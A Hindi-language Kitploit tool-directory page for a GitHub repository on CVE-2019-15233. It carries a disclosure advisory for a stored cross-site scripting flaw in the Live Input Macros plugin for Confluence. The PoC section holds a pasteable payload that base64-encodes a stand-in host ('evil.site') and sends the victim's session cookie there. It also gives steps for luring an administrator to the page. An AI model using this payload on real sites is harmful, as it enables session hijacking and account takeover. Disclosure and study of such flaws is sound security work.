Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2019-15233 — (FAB-2019-00157) मेरे द्वारा खोजी गई भेद्यता CVE-2019-15233 | Kitploit
उपकरण/GitHubGitHub/l0nax/cve-2019-15233
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubl0nax/cve-2019-15233

CVE-2019-15233

(FAB-2019-00157) मेरे द्वारा खोजी गई भेद्यता CVE-2019-15233

रिपॉजिटरी देखें
16 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2019-15233

(FAB-2019-00157) मेरे द्वारा खोजी गई भेद्यता CVE-2019-15233

एडवाइजरी: एडवाइजरी

मूल जानकारी

root@kitploit:~
Advisory ID: FAB-2019-00157
Product: Live Input Macros
Manufacturer: Old Street Solutions
Affected Version(s): 2.10 and before
Tested Version(s): 2.10
Vulnerability Type: Cross-Site Scripting (CWE-79)
Risk Level: High
CVSS v3.0: 7.6
Vektor String: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:H
Vendor Homepage: https://www.oldstreetsolutions.com/
Software Link: https://marketplace.atlassian.com/apps/1215287/live-input-macros
Solution Status: Reported
Manufacturer Notification: 2019-08-19
Solution Date: 2019-08-20
Public Disclosure: 2019-08-20
CVE Reference: CVE-2019-15233
Author of Advisory: Francesco Emanuel Bennici, FABMation GmbH

श्रेय

यह सुरक्षा भेद्यता FABMation GmbH के Francesco Emanuel Bennici [email protected] द्वारा पाई गई थी।

विवरण

Live Input Macros उपयोगकर्ताओं को आपके Confluence पृष्ठों में चेकबॉक्स, रेडियो बटन, ड्रॉपडाउन सूचियाँ और बहुत कुछ जोड़ने तथा पृष्ठ को संपादित किए बिना परिवर्तन करने की सुविधा देता है।

यदि कोई उपयोगकर्ता दुर्भावनापूर्ण कोड जोड़ता है, तो एक हमलावर Confluence साइट पर JavaScript कोड निष्पादित कर सकता है।

इसका उपयोग किसी (जैसे) व्यवस्थापक के सत्र कुकी को चुराने के लिए किया जा सकता है (सत्र अपहरण)।

PoC/ एक्सप्लॉइट

यह सामग्री कॉपी करें:

root@kitploit:~
Hello World this is my Text Box </p> </div>





alksdfjlkasdjflkj </p> " <br/> <style/onload=window.location=atob("aHR0cDovL2V2aWwuc2l0ZS8/PQ==")+document.cookie> <br/> " <p> asdasd

और Confluence पृष्ठ पर एक नया तत्व बनाएं। इस टेक्स्ट को उसमें पेस्ट करें और Confluence पृष्ठ को (जैसे) किसी सिस्टम व्यवस्थापक के साथ साझा करें, और यदि वह साइट तक पहुँचता है, तो आप उसके सत्र को हाईजैक/ "कॉपी" कर सकते हैं।

टूल डाउनलोड करें